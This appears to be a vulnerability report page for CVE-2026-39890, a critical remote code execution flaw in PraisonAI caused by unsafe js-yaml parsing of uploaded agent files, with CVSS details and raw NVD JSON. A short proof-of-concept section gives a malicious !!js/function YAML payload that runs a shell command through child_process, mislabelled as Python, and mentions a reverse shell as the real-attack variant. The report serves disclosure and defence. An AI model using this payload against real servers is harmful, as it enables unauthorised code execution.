Security Vulnerability Report
中文
CVE-2026-39890 CVSS 9.8 CRITICAL

CVE-2026-39890

Published: 2026-04-08 21:17:01
Last Modified: 2026-04-15 17:56:14
Source: [email protected]

Description

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.115

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious YAML payload for CVE-2026-39890 # This payload uses !!js/function to execute arbitrary code on the server !!js/function > function (obj) { // PoC: Execute a simple command (e.g., creating a file or reverse shell) var require = process.mainModule.require; var child_process = require('child_process'); // Example: Execute 'id' command // In a real attack, this would be a reverse shell payload child_process.exec('id', function (error, stdout, stderr) { console.log('Output: ' + stdout); }); return "Pwned by CVE-2026-39890"; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39890", "sourceIdentifier": "[email protected]", "published": "2026-04-08T21:17:01.267", "lastModified": "2026-04-15T17:56:13.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.114", "matchCriteriaId": "B0754891-B47D-441D-A0E6-710A49389AE4"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.